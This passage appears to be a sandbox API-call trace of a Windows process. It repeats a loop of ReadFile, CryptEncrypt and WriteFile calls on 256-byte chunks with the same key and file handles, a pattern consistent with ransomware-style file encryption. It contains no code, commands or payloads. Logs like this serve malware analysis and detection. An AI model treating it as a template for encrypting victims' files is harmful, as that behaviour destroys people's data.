pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.369] GetLastError () returned 0x0 [0143.369] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.369] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.369] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.369] GetLastError () returned 0x0 [0143.369] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.369] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.369] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.369] GetLastError () returned 0x0 [0143.369] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.369] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.369] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.369] GetLastError () returned 0x0 [0143.369] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.369] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.369] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.369] GetLastError () returned 0x0 [0143.369] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.370] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.370] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.370] GetLastError () returned 0x0 [0143.370] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.370] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.370] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.370] GetLastError () returned 0x0 [0143.370] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.370] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.370] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.370] GetLastError () returned 0x0 [0143.370] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.370] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.370] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.370] GetLastError () returned 0x0 [0143.370] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.370] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.370] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.370] GetLastError () returned 0x0 [0143.370] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.370] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.370] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.370] GetLastError () returned 0x0 [0143.370] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.370] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.370] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.370] GetLastError () returned 0x0 [0143.371] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.371] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.371] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.371] GetLastError () returned 0x0 [0143.371] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.371] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.371] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.371] GetLastError () returned 0x0 [0143.371] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.371] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.371] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.371] GetLastError () returned 0x0 [0143.371] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.371] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.371] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.371] GetLastError () returned 0x0 [0143.371] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.371] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.371] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.371] GetLastError () returned 0x0 [0143.371] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.371] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.371] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.371] GetLastError () returned 0x0 [0143.371] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.371] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.372] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.372] GetLastError () returned 0x0 [0143.372] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.372] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.372] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.372] GetLastError () returned 0x0 [0143.372] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.372] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.372] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.372] GetLastError () returned 0x0 [0143.372] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.372] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.372] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.372] GetLastError () returned 0x0 [0143.372] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.372] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.372] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.372] GetLastError () returned 0x0 [0143.372] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.372] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.372] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.372] GetLastError () returned 0x0 [0143.372] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.372] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.372] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.372] GetLastError () returned 0x0 [0143.372] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.372] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.373] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.373] GetLastError () returned 0x0 [0143.373] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.373] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.373] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.373] GetLastError () returned 0x0 [0143.373] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.373] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.373] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.373] GetLastError () returned 0x0 [0143.373] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.373] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.373] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.373] GetLastError () returned 0x0 [0143.373] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.373] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.373] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.373] GetLastError () returned 0x0 [0143.373] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.373] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.373] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.373] GetLastError () returned 0x0 [0143.373] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.373] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.373] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.373] GetLastError () returned 0x0 [0143.373] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0143.374] ReadFile (in: hFile=0x288, lpBuffer=0x2882640, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882640*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0143.374] CryptEncrypt (in: hKey=0x8be8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x608ff0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0143.374] GetLastError () returned 0x0 [0143.374] WriteFile (in: hFile=0x284, lpBuffer=0x608ff0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x608ff0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, 